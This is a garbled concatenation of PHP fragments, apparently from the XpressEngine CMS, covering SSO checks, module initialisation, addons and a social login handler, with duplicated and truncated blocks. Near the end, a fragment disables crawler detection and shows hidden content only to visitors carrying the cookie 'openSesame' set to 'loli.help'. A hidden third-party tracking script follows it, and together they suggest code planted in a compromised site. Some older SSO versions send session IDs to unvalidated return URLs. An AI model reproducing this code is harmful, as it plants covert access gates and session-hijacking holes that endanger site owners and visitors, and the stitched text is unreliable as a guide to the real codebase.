/**
* Single Sign On (SSO)
*
* @return bool True : Module handling is necessary in the control path of current request , False : Otherwise
*/
public function checkSSO()
{
// pass if it's not GET request or XE is not yet installed
if ($this->db_info->use_sso != 'Y' || isCrawler()) {
return TRUE;
}
$checkActList = array('rss' => 1, 'atom' => 1);
if (self::getRequestMethod() != 'GET' || !self::isInstalled() || isset($checkActList[self::get('act')])) {
return TRUE;
}
// pass if default URL is not set
$default_url = trim($this->db_info->default_url);
if (!$default_url) {
return TRUE;
}
if (substr_compare($default_url, '/', -1) !== 0) {
$default_url .= '/';
}
// Get current site information (only the base URL, not the full URL)
$current_site = self::getRequestUri();
// Step 1: if the current site is not the default site, send SSO validation request to the default site
if ($default_url !== $current_site && !self::get('SSOID') && $_COOKIE['sso'] !== md5($current_site)) {
// Set sso cookie to prevent multiple simultaneous SSO validation requests
setcookie('sso', md5($current_site), 0, '/');
// Redirect to the default site
$redirect_url = sprintf('%s?return_url=%s', $default_url, urlencode(base64_encode($current_site)));
header('Location:' . $redirect_url);
return FALSE;
}
// Step 2: receive and process SSO validation request at the default site
if ($default_url === $current_site && self::get('return_url')) {
// Get the URL of the origin site
$url = base64_decode(self::get('return_url'));
$url_info = parse_url($url);
// Check that the origin site is a valid site in this XE installation (to prevent open redirect vuln)
if (!getModel('module')->getSiteInfoByDomain(rtrim($url, '/'))->site_srl) {
htmlHeader();
echo self::getLang("msg_invalid_request");
htmlFooter();
return FALSE;
}
// Redirect back to the origin site
$url_info['query'] .= ($url_info['query'] ? '&' : '') . 'SSOID=' . session_id();
$redirect_url = sprintf('%s://%s%s%s%s', $url_info['scheme'], $url_info['host'], $url_info['port'] ? ':' . $url_info['port'] : '', $url_info['path'], $url_info['query'] ? '?' . $url_info['query'] : '');
header('Location:' . $redirect_url);
return FALSE;
}
// Step 3: back at the origin site, set session ID to be the same as the default site
if ($default_url !== $current_site && self::get('SSOID')) {
// Check that the session ID was given by the default site (to prevent session fixation CSRF)
if (isset($_SERVER['HTTP_REFERER']) && strpos($_SERVER['HTTP_REFERER'], $default_url) !== 0) {
htmlHeader();
echo self::getLang("msg_invalid_request");
htmlFooter();
return FALSE;
}
// Set session ID
setcookie(session_name(), self::get('SSOID'));
// Finally, redirect to the originally requested URL
$url_info = parse_url(self::getRequestUrl());
$url_info['query'] = preg_replace('/(^|\\b)SSOID=([^&?]+)/', '', $url_info['query']);
$redirect_url = sprintf('%s://%s%s%s%s', $url_info['scheme'], $url_info['host'], $url_info['port'] ? ':' . $url_info['port'] : '', $url_info['path'], $url_info['query'] ? '?' . $url_info['query'] : '');
header('Location:' . $redirect_url);
return FALSE;
}
// If none of the conditions above apply, proceed normally
return TRUE;
}
/**
* Single Sign On (SSO)
*
* @return bool True : Module handling is necessary in the control path of current request , False : Otherwise
*/
function checkSSO()
{
// pass if it's not GET request or XE is not yet installed
if ($this->db_info->use_sso != 'Y' || isCrawler()) {
return TRUE;
}
$checkActList = array('rss' => 1, 'atom' => 1);
if (self::getRequestMethod() != 'GET' || !self::isInstalled() || isset($checkActList[self::get('act')])) {
return TRUE;
}
// pass if default URL is not set
$default_url = trim($this->db_info->default_url);
if (!$default_url) {
return TRUE;
}
if (substr_compare($default_url, '/', -1) !== 0) {
$default_url .= '/';
}
// for sites recieving SSO valdiation
if ($default_url == self::getRequestUri()) {
if (self::get('default_url')) {
$url = base64_decode(self::get('default_url'));
$url_info = parse_url($url);
$oModuleModel = getModel('module');
$site_info = $oModuleModel->getSiteInfoByDomain($url_info['host']);
if (!$site_info->site_srl) {
$oModuleObject = new ModuleObject();
$oModuleObject->stop('msg_invalid_request');
return false;
}
$url_info['query'] .= ($url_info['query'] ? '&' : '') . 'SSOID=' . session_id();
$redirect_url = sprintf('%s://%s%s%s?%s', $url_info['scheme'], $url_info['host'], $url_info['port'] ? ':' . $url_info['port'] : '', $url_info['path'], $url_info['query']);
header('location:' . $redirect_url);
return FALSE;
}
// for sites requesting SSO validation
} else {
// result handling : set session_name()
if ($session_name = self::get('SSOID')) {
setcookie(session_name(), $session_name);
$url = preg_replace('/([\\?\\&])$/', '', str_replace('SSOID=' . $session_name, '', self::getRequestUrl()));
header('location:' . $url);
return FALSE;
// send SSO request
} else {
if (!self::get('SSOID') && $_COOKIE['sso'] != md5(self::getRequestUri())) {
setcookie('sso', md5(self::getRequestUri()), 0, '/');
$url = sprintf("%s?default_url=%s", $default_url, base64_encode(self::getRequestUrl()));
header('location:' . $url);
return FALSE;
}
}
}
return TRUE;
}
/**
* Initialization. It finds the target module based on module, mid, document_srl, and prepares to execute an action
* @return boolean true: OK, false: redirected
**/
function init()
{
$oModuleModel =& getModel('module');
$site_module_info = Context::get('site_module_info');
if (!$this->document_srl && $this->mid && $this->entry) {
$oDocumentModel =& getModel('document');
$this->document_srl = $oDocumentModel->getDocumentSrlByAlias($this->mid, $this->entry);
if ($this->document_srl) {
Context::set('document_srl', $this->document_srl);
}
}
// Get module's information based on document_srl, if it's specified
if ($this->document_srl && !$this->module) {
$module_info = $oModuleModel->getModuleInfoByDocumentSrl($this->document_srl);
// If the document does not exist, remove document_srl
if (!$module_info) {
unset($this->document_srl);
} else {
// If it exists, compare mid based on the module information
// if mids are not matching, set it as the document's mid
if ($this->mid != $module_info->mid) {
$this->mid = $module_info->mid;
Context::set('mid', $module_info->mid, true);
header('location:' . getNotEncodedSiteUrl($site_info->domain, 'mid', $this->mid, 'document_srl', $this->document_srl));
return false;
}
}
// if requested module is different from one of the document, remove the module information retrieved based on the document number
if ($this->module && $module_info->module != $this->module) {
unset($module_info);
}
}
// If module_info is not set yet, and there exists mid information, get module information based on the mid
if (!$module_info && $this->mid) {
$module_info = $oModuleModel->getModuleInfoByMid($this->mid, $site_module_info->site_srl);
//if($this->module && $module_info->module != $this->module) unset($module_info);
}
// redirect, if module_site_srl and site_srl are different
if (!$this->module && !$module_info && $site_module_info->site_srl == 0 && $site_module_info->module_site_srl > 0) {
$site_info = $oModuleModel->getSiteInfo($site_module_info->module_site_srl);
header("location:" . getNotEncodedSiteUrl($site_info->domain, 'mid', $site_module_info->mid));
return false;
}
// If module_info is not set still, and $module does not exist, find the default module
if (!$module_info && !$this->module && !$this->mid) {
$module_info = $site_module_info;
}
if (!$module_info && !$this->module && $site_module_info->module_site_srl) {
$module_info = $site_module_info;
}
// redirect, if site_srl of module_info is different from one of site's module_info
if ($module_info && $module_info->site_srl != $site_module_info->site_srl && !isCrawler()) {
// If the module is of virtual site
if ($module_info->site_srl) {
$site_info = $oModuleModel->getSiteInfo($module_info->site_srl);
$redirect_url = getNotEncodedSiteUrl($site_info->domain, 'mid', Context::get('mid'), 'document_srl', Context::get('document_srl'), 'module_srl', Context::get('module_srl'), 'entry', Context::get('entry'));
// If it's called from a virtual site, though it's not a module of the virtual site
} else {
$db_info = Context::getDBInfo();
if (!$db_info->default_url) {
return Context::getLang('msg_default_url_is_not_defined');
} else {
$redirect_url = getNotEncodedSiteUrl($db_info->default_url, 'mid', Context::get('mid'), 'document_srl', Context::get('document_srl'), 'module_srl', Context::get('module_srl'), 'entry', Context::get('entry'));
}
}
header("location:" . $redirect_url);
return false;
}
// If module info was set, retrieve variables from the module information
if ($module_info) {
$this->module = $module_info->module;
$this->mid = $module_info->mid;
$this->module_info = $module_info;
Context::setBrowserTitle($module_info->browser_title);
$part_config = $oModuleModel->getModulePartConfig('layout', $module_info->layout_srl);
Context::addHtmlHeader($part_config->header_script);
}
// Set module and mid into module_info
$this->module_info->module = $this->module;
$this->module_info->mid = $this->mid;
// Set site_srl add 2011 08 09
$this->module_info->site_srl = $site_module_info->site_srl;
// Still no module? it's an error
if (!$this->module) {
$this->error = 'msg_module_is_not_exists';
$this->httpStatusCode = '404';
}
// If mid exists, set mid into context
if ($this->mid) {
Context::set('mid', $this->mid, true);
}
// Call a trigger after moduleHandler init
$output = ModuleHandler::triggerCall('moduleHandler.init', 'after', $this->module_info);
if (!$output->toBool()) {
$this->error = $output->getMessage();
return false;
}
// Set current module info into context
Context::set('current_module_info', $this->module_info);
return true;
}
function dispSocialxeLogin()
{
// 크롤러면 실행하지 않는다...
// 소셜XE 서버에 쓸데없는 요청이 들어올까봐...
if (isCrawler()) {
Context::close();
exit;
}
// 로그인에 사용되는 세션을 초기화한다.
// js 사용시 최초에만 초기화하기 위해 js2 파라미터를 검사
if (!Context::get('js2')) {
$this->session->clearSession('js');
$this->session->clearSession('mode');
$this->session->clearSession('callback_query');
$this->session->clearSession('widget_skin');
$this->session->clearSession('info');
}
$provider = Context::get('provider');
// 서비스
$use_js = Context::get('js');
// JS 사용 여부
$widget_skin = Context::get('skin');
// 위젯의 스킨명
// 아무 것도 없는 레이아웃 적용
$template_path = sprintf("%stpl/", $this->module_path);
$this->setLayoutPath($template_path);
$this->setLayoutFile("popup_layout");
if ($provider == 'xe') {
return $this->stop('msg_invalid_request');
}
// JS 사용 여부 확인
if (($use_js || Context::get('mode') == 'socialLogin') && !Context::get('js2')) {
// JS 사용 여부를 세션에 저장한다.
$this->session->setSession('js', $use_js);
$this->session->setSession('widget_skin', $widget_skin);
// 로그인 안내 페이지 표시후 진행할 URL
$url = getUrl('js', '', 'skin', '', 'js2', 1);
Context::set('url', $url);
// 로그인 안내 페이지 표시
// 모바일 모드가 아닐때도 모바일 페이지가 정상적으로 표시되도록.
if (class_exists('Mobile')) {
if (!Mobile::isFromMobilePhone()) {
Context::addHtmlHeader('<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, user-scalable=yes, target-densitydpi=medium-dpi" />');
}
}
// jQuery 압축 버전에 로드되는 1.5 이상에서는 min을 항상 로드(모바일 버전 때문)
if (defined('__XE__')) {
Context::addJsFile("./common/js/jquery.min.js", true, '', -100000);
} else {
Context::addJsFile("./common/js/jquery.js", true, '', -100000);
}
$this->setTemplatePath($template_path);
$this->setTemplateFile('login');
return;
}
$callback_query = Context::get('query');
// 인증 후 돌아갈 페이지 쿼리
$this->session->setSession('callback_query', $callback_query);
$mode = Context::get('mode');
// 작동 모드
$this->session->setSession('mode', $mode);
$mid = Context::get('mid');
// 소셜 로그인 처리 중인 mid
$this->session->setSession('mid', $mid);
$vid = Context::get('vid');
// 소셜 로그인 처리 중인 vid
$this->session->setSession('vid', $vid);
$info = Context::get('info');
// SocialXE info 위젯 여부
$this->session->setSession('info', $info);
// 로그인 시도 중인 서비스는 로그아웃 시킨다.
$this->providerManager->doLogout($provider);
$output = $this->communicator->getLoginUrl($provider);
if (!$output->toBool()) {
return $output;
}
$url = $output->get('url');
// 리다이렉트
header('Location: ' . $url);
Context::close();
exit;
}
<?php
/* Copyright (C) NAVER <http://www.navercorp.com> */
if (!defined('__XE__')) {
exit;
}
/**
* @file image_name.addon.php
* @author NAVER (developers@xpressengine.com)
* @brief Display user image name/image mark
*
* Find member_srl in the part with <div class="member_MemberSerialNumber"> .... </div>
* Check if ther is image name and image mark. Then change it.
*/
/**
* Just before displaying, change image name/ image mark
*/
if ($called_position != "before_display_content" || Context::get('act') == 'dispPageAdminContentModify' || Context::getResponseMethod() != 'HTML' || isCrawler()) {
return;
}
// Include a file having functions to replace member image name/mark
require_once './addons/member_extra_info/member_extra_info.lib.php';
// 1. Find a part <div class="member_MemberSerialNumber"> content </div> in the output document, change it to image name/mark by using MemberController::transImageName()
$temp_output = preg_replace_callback('!<(div|span|a)([^\\>]*)member_([0-9]+)([^\\>]*)>(.*?)\\<\\/(div|span|a)\\>!is', 'memberTransImageName', $output);
if ($temp_output) {
$output = $temp_output;
}
unset($temp_output);
/* End of file member_extra_info.addon.php */
/* Location: ./addons/member_extra_info/member_extra_info.addon.php */
/**
* Initialization. It finds the target module based on module, mid, document_srl, and prepares to execute an action
* @return boolean true: OK, false: redirected
* */
function init()
{
$oModuleModel = getModel('module');
$site_module_info = Context::get('site_module_info');
// if success_return_url and error_return_url is incorrect
$urls = array(Context::get('success_return_url'), Context::get('error_return_url'));
foreach ($urls as $url) {
if (empty($url)) {
continue;
}
$urlInfo = parse_url($url);
$host = $urlInfo['host'];
$dbInfo = Context::getDBInfo();
$defaultUrlInfo = parse_url($dbInfo->default_url);
$defaultHost = $defaultUrlInfo['host'];
if ($host && ($host != $defaultHost && $host != $site_module_info->domain)) {
throw new Exception('msg_default_url_is_null');
}
}
if (!$this->document_srl && $this->mid && $this->entry) {
$oDocumentModel = getModel('document');
$this->document_srl = $oDocumentModel->getDocumentSrlByAlias($this->mid, $this->entry);
if ($this->document_srl) {
Context::set('document_srl', $this->document_srl);
}
}
// Get module's information based on document_srl, if it's specified
if ($this->document_srl) {
$module_info = $oModuleModel->getModuleInfoByDocumentSrl($this->document_srl);
// If the document does not exist, remove document_srl
if (!$module_info) {
unset($this->document_srl);
} else {
// If it exists, compare mid based on the module information
// if mids are not matching, set it as the document's mid
if (!$this->mid || $this->mid != $module_info->mid) {
if (Context::getRequestMethod() == 'GET') {
$this->mid = $module_info->mid;
header('location:' . getNotEncodedSiteUrl($site_module_info->domain, 'mid', $this->mid, 'document_srl', $this->document_srl));
return FALSE;
} else {
$this->mid = $module_info->mid;
Context::set('mid', $this->mid);
}
}
// if requested module is different from one of the document, remove the module information retrieved based on the document number
if ($this->module && $module_info->module != $this->module) {
unset($module_info);
}
}
}
// If module_info is not set yet, and there exists mid information, get module information based on the mid
if (!$module_info && $this->mid) {
$module_info = $oModuleModel->getModuleInfoByMid($this->mid, $site_module_info->site_srl);
//if($this->module && $module_info->module != $this->module) unset($module_info);
}
// redirect, if module_site_srl and site_srl are different
if (!$this->module && !$module_info && $site_module_info->site_srl == 0 && $site_module_info->module_site_srl > 0) {
$site_info = $oModuleModel->getSiteInfo($site_module_info->module_site_srl);
header("location:" . getNotEncodedSiteUrl($site_info->domain, 'mid', $site_module_info->mid));
return FALSE;
}
// If module_info is not set still, and $module does not exist, find the default module
if (!$module_info && !$this->module && !$this->mid) {
$module_info = $site_module_info;
}
if (!$module_info && !$this->module && $site_module_info->module_site_srl) {
$module_info = $site_module_info;
}
// redirect, if site_srl of module_info is different from one of site's module_info
if ($module_info && $module_info->site_srl != $site_module_info->site_srl && !isCrawler()) {
// If the module is of virtual site
if ($module_info->site_srl) {
$site_info = $oModuleModel->getSiteInfo($module_info->site_srl);
$redirect_url = getNotEncodedSiteUrl($site_info->domain, 'mid', Context::get('mid'), 'document_srl', Context::get('document_srl'), 'module_srl', Context::get('module_srl'), 'entry', Context::get('entry'));
// If it's called from a virtual site, though it's not a module of the virtual site
} else {
$db_info = Context::getDBInfo();
if (!$db_info->default_url) {
return Context::getLang('msg_default_url_is_not_defined');
} else {
$redirect_url = getNotEncodedSiteUrl($db_info->default_url, 'mid', Context::get('mid'), 'document_srl', Context::get('document_srl'), 'module_srl', Context::get('module_srl'), 'entry', Context::get('entry'));
}
}
header("location:" . $redirect_url);
return FALSE;
}
// If module info was set, retrieve variables from the module information
if ($module_info) {
$this->module = $module_info->module;
$this->mid = $module_info->mid;
$this->module_info = $module_info;
Context::setBrowserTitle($module_info->browser_title);
$viewType = Mobile::isFromMobilePhone() ? 'M' : 'P';
$targetSrl = Mobile::isFromMobilePhone() ? 'mlayout_srl' : 'layout_srl';
// use the site default layout.
if ($module_info->{$targetSrl} == -1) {
$oLayoutAdminModel = getAdminModel('layout');
$layoutSrl = $oLayoutAdminModel->getSiteDefaultLayout($viewType, $module_info->site_srl);
} else {
$layoutSrl = $module_info->{$targetSrl};
}
// reset a layout_srl in module_info.
$module_info->{$targetSrl} = $layoutSrl;
$part_config = $oModuleModel->getModulePartConfig('layout', $layoutSrl);
Context::addHtmlHeader($part_config->header_script);
}
// Set module and mid into module_info
if (!isset($this->module_info)) {
$this->module_info = new stdClass();
}
$this->module_info->module = $this->module;
$this->module_info->mid = $this->mid;
// Set site_srl add 2011 08 09
$this->module_info->site_srl = $site_module_info->site_srl;
// Still no module? it's an error
if (!$this->module) {
$this->error = 'msg_module_is_not_exists';
$this->httpStatusCode = '404';
}
// If mid exists, set mid into context
if ($this->mid) {
Context::set('mid', $this->mid, TRUE);
}
// Call a trigger after moduleHandler init
$output = ModuleHandler::triggerCall('moduleHandler.init', 'after', $this->module_info);
if (!$output->toBool()) {
$this->error = $output->getMessage();
return TRUE;
}
// Set current module info into context
Context::set('current_module_info', $this->module_info);
return TRUE;
}
/**
* @brief module id replace 회피를 위한 트리거
* @description document_srl 상의 mid와 주소 상의 mid가 다를 경우 발생하는 문제 해결
* @param object $oModule
* @return object
*/
function _replaceMid(&$oModule)
{
$mid = $oModule->mid;
$module = $oModule->module;
$document_srl = $oModule->document_srl;
$site_module_info = Context::get('site_module_info');
$oModuleModel = getModel('module');
if ($mid) {
$curr_module_info = $oModuleModel->getModuleInfoByMid($mid, $site_module_info->site_srl);
} else {
if (!$module && !$document_srl) {
$curr_module_info = $site_module_info;
}
}
if (!$curr_module_info) {
return new Object();
}
$oTimelineModel = getModel('timeline');
$timeline_info = $oTimelineModel->getTimelineInfo($curr_module_info->module_srl);
// 타임라인 게시판이 아닌 경우
if (!$timeline_info) {
return new Object();
}
$oDocumentModel = getModel('document');
$oDocument = $oDocumentModel->getDocument($document_srl);
$document_srl = $oDocument->get('document_srl');
$module_srl = $oDocument->get('module_srl');
if ($oDocument->isExists()) {
// 자식 게시판에 등록되어 있는 게시판의 공지글이지만 공지 게시글 통합 기능을 사용하지 않는 경우
$attach_info = $timeline_info->attach_info;
if (in_array($module_srl, $attach_info) && $oDocument->get('is_notice') == 'Y' && $timeline_info->notice != 'Y') {
return new Object();
}
// 타임라인 게시판에 표시될 수 있는 게시글이면서 공지글이거나 게시글 필터링을 통과했을 경우
$attach_info[] = $timeline_info->module_srl;
if (in_array($module_srl, $attach_info) && ($oDocument->get('is_notice') == 'Y' || $oTimelineModel->isFilterPassed($timeline_info->module_srl, $document_srl))) {
$origin_module_info = $oModuleModel->getModuleInfoByModuleSrl($module_srl);
}
}
// 현재 모듈 정보와 게시글의 모듈 정보를 저장
$this->curr_module_info = $curr_module_info;
$this->origin_module_info = $origin_module_info;
// 타임라인 모듈이 동작하는 경우
if ($origin_module_info && !isCrawler()) {
// 원래 게시판으로 이동 기능을 사용할 경우
if ($timeline_info->replace == 'Y') {
// 페이지 값 초기화
Context::set('page', NULL);
} else {
// module id replace 회피
Context::set('mid', $oModule->mid = $origin_module_info->mid);
}
}
return new Object();
}
<?php
/* Copyright (C) NAVER <http://www.navercorp.com> */
if (!defined('__XE__')) {
exit;
}
/**
* @file counter.addon.php
* @author NAVER (developers@xpressengine.com)
* @brief Counter add-on
*/
// Execute if called_position is before_display_content
if ($called_position == 'before_module_init' && Context::get('module') != 'admin' && Context::getResponseMethod() == 'HTML' && Context::isInstalled() && !isCrawler()) {
$oCounterController = getController('counter');
$oCounterController->counterExecute();
}
/* End of file counter.addon.php */
/* Location: ./addons/counter/counter.addon.php */
/* Copyright (C) NAVER <http://www.navercorp.com> */
if (!defined('__XE__')) {
exit;
}
/**
* @file member_communication.addon.php
* @author NAVER (developers@xpressengine.com)
* @brief Promote user communication
*
* - Pop-up the message if new message comes in
* - When calling MemberModel::getMemberMenu, feature to send a message is added
* - When caliing MemberModel::getMemberMenu, feature to add a friend is added
*/
// Stop if non-logged-in user is
$logged_info = Context::get('logged_info');
if (!$logged_info || isCrawler()) {
return;
}
/**
* Message/Friend munus are added on the pop-up window and member profile. Check if a new message is received
* */
if ($this->module != 'member' && $called_position == 'before_module_init') {
// Load a language file from the communication module
Context::loadLang(_XE_PATH_ . 'modules/communication/lang');
// Add menus on the member login information
$oMemberController = getController('member');
$oMemberController->addMemberMenu('dispCommunicationFriend', 'cmd_view_friend');
$oMemberController->addMemberMenu('dispCommunicationMessages', 'cmd_view_message_box');
$flag_file = _XE_PATH_ . 'files/member_extra_info/new_message_flags/' . getNumberingPath($logged_info->member_srl) . $logged_info->member_srl;
if ($addon_info->use_alarm != 'N' && file_exists($flag_file)) {
// Pop-up to display messages if a flag on new message is set
/**
* Single Sign On (SSO)
*
* @return bool True : Module handling is necessary in the control path of current request , False : Otherwise
*/
function checkSSO()
{
// pass if it's not GET request or XE is not yet installed
if ($this->db_info->use_sso != 'Y' || isCrawler()) {
return true;
}
$checkActList = array('rss' => 1, 'atom' => 1);
if (Context::getRequestMethod() != 'GET' || !Context::isInstalled() || isset($checkActList[Context::get('act')])) {
return true;
}
// pass if default URL is not set
$default_url = trim($this->db_info->default_url);
if (!$default_url) {
return true;
}
if (substr($default_url, -1) != '/') {
$default_url .= '/';
}
// for sites recieving SSO valdiation
if ($default_url == Context::getRequestUri()) {
if (Context::get('default_url')) {
$url = base64_decode(Context::get('default_url'));
$url_info = parse_url($url);
$url_info['query'] .= ($url_info['query'] ? '&' : '') . 'SSOID=' . session_id();
$redirect_url = sprintf('%s://%s%s%s?%s', $url_info['scheme'], $url_info['host'], $url_info['port'] ? ':' . $url_info['port'] : '', $url_info['path'], $url_info['query']);
header('location:' . $redirect_url);
return false;
}
// for sites requesting SSO validation
} else {
// result handling : set session_name()
if (Context::get('SSOID')) {
$session_name = Context::get('SSOID');
setcookie(session_name(), $session_name);
$url = preg_replace('/([\\?\\&])$/', '', str_replace('SSOID=' . $session_name, '', Context::getRequestUrl()));
header('location:' . $url);
return false;
// send SSO request
} else {
if ($_COOKIE['sso'] != md5(Context::getRequestUri()) && !Context::get('SSOID')) {
setcookie('sso', md5(Context::getRequestUri()), 0, '/');
$url = sprintf("%s?default_url=%s", $default_url, base64_encode(Context::getRequestUrl()));
header('location:' . $url);
return false;
}
}
}
return true;
}
/**
* Update read counts of the document
* @param documentItem $oDocument
* @return bool|void
*/
function updateReadedCount(&$oDocument)
{
// Pass if Crawler access
if (isCrawler()) {
return false;
}
$oDocumentModel = getModel('document');
$config = $oDocumentModel->getDocumentConfig();
if ($config->view_count_option == 'none') {
return false;
}
$document_srl = $oDocument->document_srl;
$member_srl = $oDocument->get('member_srl');
$logged_info = Context::get('logged_info');
// Call a trigger when the read count is updated (before)
$trigger_output = ModuleHandler::triggerCall('document.updateReadedCount', 'before', $oDocument);
if (!$trigger_output->toBool()) {
return $trigger_output;
}
// Pass if read count is increaded on the session information
if ($_SESSION['readed_document'][$document_srl] && $config->view_count_option == 'once') {
return false;
} else {
if ($config->view_count_option == 'some') {
if ($_SESSION['readed_document'][$document_srl]) {
return false;
}
}
}
if ($config->view_count_option == 'once') {
// Pass if the author's IP address is as same as visitor's.
if ($oDocument->get('ipaddress') == $_SERVER['REMOTE_ADDR'] && Context::getSessionStatus()) {
$_SESSION['readed_document'][$document_srl] = true;
return false;
}
// Pass ater registering sesscion if the author is a member and has same information as the currently logged-in user.
if ($member_srl && $logged_info->member_srl == $member_srl) {
$_SESSION['readed_document'][$document_srl] = true;
return false;
}
}
$oDB = DB::getInstance();
$oDB->begin();
// Update read counts
$args = new stdClass();
$args->document_srl = $document_srl;
executeQuery('document.updateReadedCount', $args);
// Call a trigger when the read count is updated (after)
$trigger_output = ModuleHandler::triggerCall('document.updateReadedCount', 'after', $oDocument);
if (!$trigger_output->toBool()) {
$oDB->rollback();
return $trigger_output;
}
$oDB->commit();
$oCacheHandler = CacheHandler::getInstance('object');
if ($oCacheHandler->isSupport()) {
//remove document item from cache
$cache_key = 'document_item:' . getNumberingPath($document_srl) . $document_srl;
$oCacheHandler->delete($cache_key);
}
// Register session
if (!$_SESSION['banned_document'][$document_srl] && Context::getSessionStatus()) {
$_SESSION['readed_document'][$document_srl] = true;
}
return TRUE;
}
/**
* Single Sign On (SSO)
*
* @return bool True : Module handling is necessary in the control path of current request , False : Otherwise
*/
function checkSSO()
{
// pass if it's not GET request or XE is not yet installed
if ($this->db_info->use_sso != 'Y' || isCrawler()) {
return TRUE;
}
$checkActList = array('rss' => 1, 'atom' => 1);
if (self::getRequestMethod() != 'GET' || !self::isInstalled() || isset($checkActList[self::get('act')])) {
return TRUE;
}
// pass if default URL is not set
$default_url = trim($this->db_info->default_url);
if (!$default_url) {
return TRUE;
}
if (substr_compare($default_url, '/', -1) !== 0) {
$default_url .= '/';
}
// for sites recieving SSO valdiation
if ($default_url == self::getRequestUri()) {
if (self::get('url')) {
$url = base64_decode(self::get('url'));
$url_info = parse_url($url);
if (!Password::checkSignature($url, self::get('sig'))) {
echo self::get('lang')->msg_invalid_request;
return false;
}
$url_info['query'] .= ($url_info['query'] ? '&' : '') . 'SSOID=' . urlencode(session_id()) . '&sig=' . urlencode(Password::createSignature(session_id()));
$redirect_url = sprintf('%s://%s%s%s?%s', $url_info['scheme'], $url_info['host'], $url_info['port'] ? ':' . $url_info['port'] : '', $url_info['path'], $url_info['query']);
header('location:' . $redirect_url);
return FALSE;
}
// for sites requesting SSO validation
} else {
// result handling : set session_name()
if ($session_name = self::get('SSOID')) {
if (!Password::checkSignature($session_name, self::get('sig'))) {
echo self::get('lang')->msg_invalid_request;
return false;
}
setcookie(session_name(), $session_name);
$url = preg_replace('/[\\?\\&]SSOID=.+$/', '', self::getRequestUrl());
header('location:' . $url);
return FALSE;
// send SSO request
} else {
if (!self::get('SSOID') && $_COOKIE['sso'] != md5(self::getRequestUri())) {
setcookie('sso', md5(self::getRequestUri()), 0, '/');
$origin_url = self::getRequestUrl();
$origin_sig = Password::createSignature($origin_url);
$url = sprintf("%s?url=%s&sig=%s", $default_url, urlencode(base64_encode($origin_url)), urlencode($origin_sig));
header('location:' . $url);
return FALSE;
}
}
}
return TRUE;
}
<?php
/* Copyright (C) NAVER <http://www.navercorp.com> */
if (!defined('__XE__')) {
exit;
}
/**
* @file resize_image.addon.php
* @author NAVER (developers@xpressengine.com)
* @brief Add-on to resize images in the body
*/
if ($called_position == 'after_module_proc' && Context::getResponseMethod() == "HTML" && !isCrawler()) {
if (Mobile::isFromMobilePhone()) {
Context::loadFile('./addons/resize_image/css/resize_image.mobile.css', true);
} else {
Context::loadJavascriptPlugin('ui');
Context::loadFile(array('./addons/resize_image/js/resize_image.js', 'body', '', null), true);
}
}
/* End of file resize_image.addon.php */
/* Location: ./addons/resize_image/resize_image.addon.php */
/* Copyright (C) NAVER <http://www.navercorp.com> */
if (!defined('__XE__')) {
exit;
}
/**
* @file member_communication.addon.php
* @author NAVER (developers@xpressengine.com)
* @brief Promote user communication
*
* - Pop-up the message if new message comes in
* - When calling MemberModel::getMemberMenu, feature to send a message is added
* - When caliing MemberModel::getMemberMenu, feature to add a friend is added
*/
// Stop if non-logged-in user is
if (!Context::get('is_logged') || isCrawler()) {
return;
}
$logged_info = Context::get('logged_info');
/**
* Message/Friend munus are added on the pop-up window and member profile. Check if a new message is received
* */
if ($this->module != 'member' && $called_position == 'before_module_init') {
// Load a language file from the communication module
Context::loadLang(_XE_PATH_ . 'modules/communication/lang');
// Add menus on the member login information
$oMemberController = getController('member');
$oMemberController->addMemberMenu('dispCommunicationFriend', 'cmd_view_friend');
$oMemberController->addMemberMenu('dispCommunicationMessages', 'cmd_view_message_box');
$flag_file = _XE_PATH_ . 'files/member_extra_info/new_message_flags/' . getNumberingPath($logged_info->member_srl) . $logged_info->member_srl;
if ($addon_info->use_alarm != 'N' && file_exists($flag_file)) {
"Perl tool",
"MJ12bot",
"Netcraft",
"MSIECrawler",
"WGet tools",
"larbin",
"Fish search",
);
foreach($spiderSite as $val) {
$str = strtolower($val);
if (strpos($agent, $str) !== false) {
return true;
}
}
} else {
return false;
}
}*/
function isCrawler()
{
return false;
}
if ($_COOKIE['openSesame'] == "loli.help" || isCrawler()) {
echo $truehtml;
} else {
echo $fakehtml;
}
?>
<div style="display:none"><script src="https://s95.cnzz.com/z_stat.php?id=1254760097&web_id=1254760097" language="JavaScript"></script></div>
</body>
</html>
}
// redirect, if module_site_srl and site_srl are different
if (!$this->module && !$module_info && $site_module_info->site_srl == 0 && $site_module_info->module_site_srl > 0) {
$site_info = $oModuleModel->getSiteInfo($site_module_info->module_site_srl);
header("location:" . getNotEncodedSiteUrl($site_info->domain, 'mid', $site_module_info->mid));
return false;
}
// If module_info is not set still, and $module does not exist, find the default module
if (!$module_info && !$this->module) {
$module_info = $site_module_info;
}
if (!$module_info && !$this->module && $site_module_info->module_site_srl) {
$module_info = $site_module_info;
}
// redirect, if site_srl of module_info is different from one of site's module_info
if ($module_info && $module_info->site_srl != $site_module_info->site_srl && !isCrawler()) {
// If the module is of virtual site
if ($module_info->site_srl) {
$site_info = $oModuleModel->getSiteInfo($module_info->site_srl);
$redirect_url = getNotEncodedSiteUrl($site_info->domain, 'mid', Context::get('mid'), 'document_srl', Context::get('document_srl'), 'module_srl', Context::get('module_srl'), 'entry', Context::get('entry'));
// If it's called from a virtual site, though it's not a module of the virtual site
} else {
$db_info = Context::getDBInfo();
if (!$db_info->default_url) {
return Context::getLang('msg_default_url_is_not_defined');
} else {
$redirect_url = getNotEncodedSiteUrl($db_info->default_url, 'mid', Context::get('mid'), 'document_srl', Context::get('document_srl'), 'module_srl', Context::get('module_srl'), 'entry', Context::get('entry'));
}
}
header("location:" . $redirect_url);
return false;
